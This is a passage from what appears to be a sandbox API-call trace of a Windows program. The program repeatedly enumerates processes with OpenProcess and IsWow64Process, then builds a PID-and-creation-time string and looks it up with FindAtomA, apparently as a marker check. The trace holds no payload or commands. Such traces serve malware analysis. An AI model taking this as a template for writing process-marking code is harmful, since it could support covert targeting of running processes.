	[0081.366] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.366] CloseHandle (hObject=0x35c) returned 1
	[0081.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x35c
	[0081.366] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.366] CloseHandle (hObject=0x35c) returned 1
	[0081.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x35c
	[0081.366] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.366] CloseHandle (hObject=0x35c) returned 1
	[0081.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x35c
	[0081.366] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.367] CloseHandle (hObject=0x35c) returned 1
	[0081.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x35c
	[0081.367] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.367] CloseHandle (hObject=0x35c) returned 1
	[0081.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x35c
	[0081.367] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.367] CloseHandle (hObject=0x35c) returned 1
	[0081.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x35c
	[0081.367] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.367] CloseHandle (hObject=0x35c) returned 1
	[0081.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x35c
	[0081.367] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.367] CloseHandle (hObject=0x35c) returned 1
	[0081.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x35c
	[0081.367] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.367] CloseHandle (hObject=0x35c) returned 1
	[0081.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x35c
	[0081.367] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.368] CloseHandle (hObject=0x35c) returned 1
	[0081.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x35c
	[0081.368] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.368] CloseHandle (hObject=0x35c) returned 1
	[0081.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x35c
	[0081.368] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.368] CloseHandle (hObject=0x35c) returned 1
	[0081.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x35c
	[0081.368] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.368] CloseHandle (hObject=0x35c) returned 1
	[0081.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x35c
	[0081.368] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.368] CloseHandle (hObject=0x35c) returned 1
	[0081.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x35c
	[0081.368] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.368] CloseHandle (hObject=0x35c) returned 1
	[0081.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x35c
	[0081.368] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.368] CloseHandle (hObject=0x35c) returned 1
	[0081.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x35c
	[0081.369] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.369] CloseHandle (hObject=0x35c) returned 1
	[0081.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x35c
	[0081.369] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.369] CloseHandle (hObject=0x35c) returned 1
	[0081.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x35c
	[0081.369] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.369] CloseHandle (hObject=0x35c) returned 1
	[0081.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x35c
	[0081.369] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.369] CloseHandle (hObject=0x35c) returned 1
	[0081.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x35c
	[0081.369] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.369] CloseHandle (hObject=0x35c) returned 1
	[0081.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x35c
	[0081.370] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.370] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.370] GetProcessTimes (in: hProcess=0x35c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.370] wsprintfA (in: param_1=0x73be78, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.370] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.370] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.370] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.370] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.370] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.371] CloseHandle (hObject=0x35c) returned 1
	[0081.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x35c
	[0081.371] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.371] CloseHandle (hObject=0x35c) returned 1
	[0081.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x36c
	[0081.442] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.442] CloseHandle (hObject=0x36c) returned 1
	[0081.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x36c
	[0081.443] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.443] CloseHandle (hObject=0x36c) returned 1
	[0081.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x36c
	[0081.443] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.443] CloseHandle (hObject=0x36c) returned 1
	[0081.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x36c
	[0081.443] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.443] CloseHandle (hObject=0x36c) returned 1
	[0081.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x36c
	[0081.443] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.443] CloseHandle (hObject=0x36c) returned 1
	[0081.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x36c
	[0081.443] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.443] CloseHandle (hObject=0x36c) returned 1
	[0081.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x36c
	[0081.443] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.443] CloseHandle (hObject=0x36c) returned 1
	[0081.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x36c
	[0081.444] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.444] CloseHandle (hObject=0x36c) returned 1
	[0081.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x36c
	[0081.444] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.444] CloseHandle (hObject=0x36c) returned 1
	[0081.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x36c
	[0081.444] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.444] CloseHandle (hObject=0x36c) returned 1
	[0081.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x36c
	[0081.444] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.444] CloseHandle (hObject=0x36c) returned 1
	[0081.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x36c
	[0081.444] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.445] CloseHandle (hObject=0x36c) returned 1
	[0081.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x36c
	[0081.445] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.445] CloseHandle (hObject=0x36c) returned 1
	[0081.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x36c
	[0081.445] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.445] CloseHandle (hObject=0x36c) returned 1
	[0081.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x36c
	[0081.445] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.445] CloseHandle (hObject=0x36c) returned 1
	[0081.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x36c
	[0081.445] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.445] CloseHandle (hObject=0x36c) returned 1
	[0081.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x36c
	[0081.446] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.446] CloseHandle (hObject=0x36c) returned 1
	[0081.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x36c
	[0081.446] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.446] CloseHandle (hObject=0x36c) returned 1
	[0081.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x36c
	[0081.446] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.446] CloseHandle (hObject=0x36c) returned 1
	[0081.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x36c
	[0081.446] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.446] CloseHandle (hObject=0x36c) returned 1
	[0081.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x36c
	[0081.446] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.446] CloseHandle (hObject=0x36c) returned 1
	[0081.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x36c
	[0081.447] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.447] CloseHandle (hObject=0x36c) returned 1
	[0081.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x36c
	[0081.447] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.447] CloseHandle (hObject=0x36c) returned 1
	[0081.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x36c
	[0081.447] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.447] CloseHandle (hObject=0x36c) returned 1
	[0081.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x36c
	[0081.447] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.447] CloseHandle (hObject=0x36c) returned 1
	[0081.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x36c
	[0081.447] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.447] CloseHandle (hObject=0x36c) returned 1
	[0081.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x36c
	[0081.447] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.447] CloseHandle (hObject=0x36c) returned 1
	[0081.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x36c
	[0081.448] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.448] CloseHandle (hObject=0x36c) returned 1
	[0081.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x36c
	[0081.448] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.448] CloseHandle (hObject=0x36c) returned 1
	[0081.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x36c
	[0081.448] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.448] CloseHandle (hObject=0x36c) returned 1
	[0081.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0081.448] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.448] CloseHandle (hObject=0x36c) returned 1
	[0081.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x36c
	[0081.448] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.449] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.449] GetProcessTimes (in: hProcess=0x36c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.449] wsprintfA (in: param_1=0x73e980, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.449] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.449] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.449] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.449] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.449] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.449] CloseHandle (hObject=0x36c) returned 1
	[0081.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x36c
	[0081.450] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.450] CloseHandle (hObject=0x36c) returned 1
	[0081.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x36c
	[0081.520] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.521] CloseHandle (hObject=0x36c) returned 1
	[0081.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x36c
	[0081.521] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.521] CloseHandle (hObject=0x36c) returned 1
	[0081.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x36c
	[0081.521] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.521] CloseHandle (hObject=0x36c) returned 1
	[0081.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x36c
	[0081.521] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.521] CloseHandle (hObject=0x36c) returned 1
	[0081.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x36c
	[0081.521] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.521] CloseHandle (hObject=0x36c) returned 1
	[0081.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x36c
	[0081.522] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.522] CloseHandle (hObject=0x36c) returned 1
	[0081.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x36c
	[0081.522] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.522] CloseHandle (hObject=0x36c) returned 1
	[0081.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x36c
	[0081.522] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.522] CloseHandle (hObject=0x36c) returned 1
	[0081.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x36c
	[0081.522] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.522] CloseHandle (hObject=0x36c) returned 1
	[0081.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x36c
	[0081.523] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.523] CloseHandle (hObject=0x36c) returned 1
	[0081.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x36c
	[0081.523] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.523] CloseHandle (hObject=0x36c) returned 1
	[0081.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x36c
	[0081.523] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.523] CloseHandle (hObject=0x36c) returned 1
	[0081.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x36c
	[0081.523] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.523] CloseHandle (hObject=0x36c) returned 1
	[0081.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x36c
	[0081.523] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.523] CloseHandle (hObject=0x36c) returned 1
	[0081.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x36c
	[0081.523] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.524] CloseHandle (hObject=0x36c) returned 1
	[0081.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x36c
	[0081.524] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.524] CloseHandle (hObject=0x36c) returned 1
	[0081.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x36c
	[0081.524] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.524] CloseHandle (hObject=0x36c) returned 1
	[0081.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x36c
	[0081.524] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.524] CloseHandle (hObject=0x36c) returned 1
	[0081.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x36c
	[0081.524] IsWow64Process (in: hProcess=0x36c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
